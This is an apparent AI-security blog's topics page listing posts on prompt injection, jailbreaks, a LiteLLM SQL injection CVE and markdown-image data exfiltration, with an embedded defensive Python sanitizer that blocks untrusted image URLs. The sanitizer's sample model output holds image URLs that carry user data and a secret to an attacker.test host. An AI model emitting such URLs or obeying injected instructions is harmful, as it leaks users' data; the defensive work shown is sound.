Topics
Browse posts by category and tag — every topic we cover, with the latest pieces under each.
Tags
- #llm-security 9
- #prompt-injection 5
- #guardrails 3
- #supply-chain 3
- #agentic-ai 2
- #agents 2
- #data-exfiltration 2
- #owasp-llm 2
- #threat-model 2
- #weekly-digest 2
- #2026 1
- #agent-security 1
- #agentic ai 1
- #ai agents 1
- #ai-attack-examples 1
- #ai-gateway 1
- #ai-risk 1
- #chatbots 1
- #csp 1
- #cve 1
- #jailbreak 1
- #litellm 1
- #llm security 1
- #model-extraction 1
- #offensive-ai 1
- #owasp 1
- #policy 1
- #prompt injection 1
- #rag 1
- #sql-injection 1
- #supply chain security 1
- #threat-intel 1
- #vulnerability-framework 1
Categories
news 7 posts
- AI Sec Weekly: Friday, May 22, 2026
  This week's digest: SSRF through agent tool-use, the model supply-chain class and why safetensors matters, and model extraction as a business risk.
- AI on the Offense: Google's Zero-Day Warning, Reasoning-Model Jailbreaks, and Government Testing
  Google says it caught an attacker using an LLM to find a zero-day, peer-reviewed research shows reasoning models can autonomously jailbreak other models
- How LLM Chatbots Leak Data Through Their Own Rendered Output
  A recurring AI-security finding: an injected instruction makes the model emit a markdown image whose URL carries the user's data to an attacker server.
- AI Sec Weekly: Friday, May 15, 2026
  This week's digest: indirect injection becomes the agent-era default, the markdown-rendering data-exfiltration class, and why system-prompt secrecy keeps
- The LiteLLM SQL Injection (CVE-2026-42208) and Why AI Gateways Are Crown Jewels
  A pre-auth SQL injection in the LiteLLM proxy landed in CISA's KEV catalog and was exploited within roughly 36 hours of disclosure.
- Indirect Prompt Injection: The Agent Era's Default Vulnerability
  As LLM agents gained tools and memory, the dangerous injection stopped coming from the user and started coming from the data the agent reads.
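The markdown-image exfiltration class that two of the posts above describe (an injected instruction makes the model emit an image whose URL carries user data to an attacker-controlled host) is cheapest to stop at the renderer, before the browser ever issues the image request. The block below is an added example and not code from any of the linked posts: a Python sanitizer that strips markdown and raw HTML images from model output unless the URL is https, points at an allowlisted host, and carries no query string or fragment (the usual data channel). The allowlist host cdn.example-assistant.test, the attacker.test domain and the sample model output are constructed for illustration.

```python
"""Renderer-side guard against markdown-image data exfiltration from LLM output.

Added example. Assumptions: images are rendered from model output by a component
we control, and legitimate images only ever come from ALLOWED_IMAGE_HOSTS.
"""
import re
from urllib.parse import urlsplit

# Hypothetical allowlist: the only host our UI should ever load images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example-assistant.test"}

# Markdown image: ![alt](url "optional title"), with an optional <...> around the URL.
MD_IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)')

# Raw HTML <img ... src="..."> that many markdown renderers pass through unchanged.
HTML_IMG_RE = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>', re.IGNORECASE)


def is_safe_image_url(url: str, allowed_hosts=frozenset(ALLOWED_IMAGE_HOSTS)) -> bool:
    """True only for https URLs on an allowlisted host with no query or fragment.

    A query string or fragment on an otherwise trusted host is still rejected:
    the exfiltration payload rides in exactly those components.
    """
    parts = urlsplit(url.strip())
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return False
    if parts.query or parts.fragment:
        return False
    return True


def sanitize_markdown_images(text: str):
    """Replace every unsafe image with a visible placeholder.

    Returns (sanitized_text, blocked_urls) so the caller can both render the
    cleaned output and log the blocked URLs as an injection indicator.
    """
    blocked = []

    def md_repl(m: re.Match) -> str:
        alt, url = m.group(1), m.group(2)
        if is_safe_image_url(url):
            return m.group(0)
        blocked.append(url)
        return f"[image removed: {alt or 'untrusted source'}]"

    def html_repl(m: re.Match) -> str:
        url = m.group(1)
        if is_safe_image_url(url):
            return m.group(0)
        blocked.append(url)
        return "[image removed: untrusted source]"

    text = HTML_IMG_RE.sub(html_repl, text)
    text = MD_IMAGE_RE.sub(md_repl, text)
    return text, blocked


# Constructed sample of model output after a successful injection: the first and
# third images smuggle conversation data out in the URL; the second is legitimate.
SAMPLE_OUTPUT = (
    "Here is your summary.\n"
    "![loading](https://attacker.test/pixel.png?d=user%3Aalice%3Bcard%3A4111...)\n"
    "![logo](https://cdn.example-assistant.test/logo.png)\n"
    '<img src="http://attacker.test/x.gif?q=secret">\n'
)

if __name__ == "__main__":
    cleaned, blocked_urls = sanitize_markdown_images(SAMPLE_OUTPUT)
    print(cleaned)
    print("blocked:", blocked_urls)
```

The browser-side complement is a Content-Security-Policy `img-src` directive restricted to the same allowlist, so that anything the sanitizer misses (a renderer quirk, a new image syntax) still cannot trigger a request to an attacker host; treat every blocked URL as a prompt-injection alert rather than a cosmetic fix.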
LLM Security 2 posts
- OWASP LLM Top 10 2026 Changes: What's New, What's Gone, and What's Coming
  A practitioner breakdown of the OWASP LLM Top 10 2026 changes: two new threat categories dropped, three proposed additions for 2026, and a companion
- LLM Prompt Injection Attack Examples: Direct, Indirect, and Agentic Exploits
  A practitioner-level breakdown of LLM prompt injection attack examples, from basic instruction overrides to CVE-rated zero-click exploits in production